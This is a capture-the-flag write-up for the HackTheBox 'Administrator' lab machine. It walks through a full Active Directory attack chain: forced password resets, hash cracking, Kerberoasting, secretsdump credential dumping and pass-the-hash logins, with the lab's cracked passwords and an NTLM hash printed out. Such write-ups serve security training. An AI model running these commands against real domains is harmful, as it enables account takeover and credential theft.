HackTheBox Administrator Writeup
Explore the fundamentals of cybersecurity in the University Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts#
Edit the /etc/hosts file and add the following entries:
10.10.11.42 administrator.htb
Script to add hosts automatically#
ip="10.10.11.42"
domain="administrator.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping#
nmap -sCV administrator.htb
Nmap scan report for administrator.htb (10.10.11.42)
Host is up (0.056s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-18 18:45:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2024-11-18T18:45:39
|_ start_date: N/A
BloodHound Enumeration#
Run BloodHound to collect Active Directory data:
bloodhound-python -c All -u Olivia -p 'ichliebedich' -d administrator.htb -ns 10.10.11.42
- After ingestion (see this tutorial), we find that Olivia has
GenericAllpermission over Michael.
Changing Passwords with BloodyAD#
Change Michael’s Password#
bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "olivia" -p "ichliebedich" set password "michael" "Password@123"
Change Benjamin’s Password#
bloodyad --host "10.10.11.42" -d "Administrator.htb" -u "michael" -p "Password@123" set password "benjamin" "Password@123"
Accessing FTP#
Login to FTP using Benjamin’s credentials:
ftp 10.10.11.42
- Username:
benjamin - Password:
Password@123
Download the backup file:
ls
get Backup.psafe3
Cracking the Password Safe File#
Crack the password safe file:
hashcat -m 5200 -a 0 Backup.psafe3 /usr/share/dict/rockyou.txt
- Cracked Password:
tekieromucho
Install a Password Safe reader (e.g., PasswordSafe) to open Backup.psafe3 using the cracked password.
Extracted credentials:
- alexander:
UrkIbagoxMyUGw0aPlj9B0AXSea4Sw - emily:
UXLCI5iETUsIBoFVTj8yQFKoHjXmb - emma:
WwANQWnmJnGV07WQN8bMS7FMAbjNur
Accessing the Machine via Evil-WinRM#
Login as Emily:
evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Retrieve the user flag:
cat \users\emily\Desktop\user.txt
Kerberoasting Attack#
Attempt Kerberoasting:
targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Encountered error:
[!] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
Fix the clock skew:
serverskew=$(ntpdate -q administrator.htb | awk '{print $6}' | head -n 1 | tr -d '+,' | cut -d '.' -f 1)
faketime "$(date -d "+$serverskew seconds" +"%Y-%m-%d %H:%M:%S")" targetedkerberoast -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
Save the hash to hash.txt.
Crack the hash:
hashcat hash.txt /usr/share/dict/rockyou.txt
- Cracked Password:
limpbizkit
Dumping Secrets with SecretsDump#
Dump secrets using Ethan’s credentials:
secretsdump.py 'administrator.htb/ethan:limpbizkit'@'administrator.htb'
Gaining Administrator Access#
Login as Administrator using the dumped NTLM hash:
evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'
Retrieve the root flag:
type \users\administrator\desktop\root.txt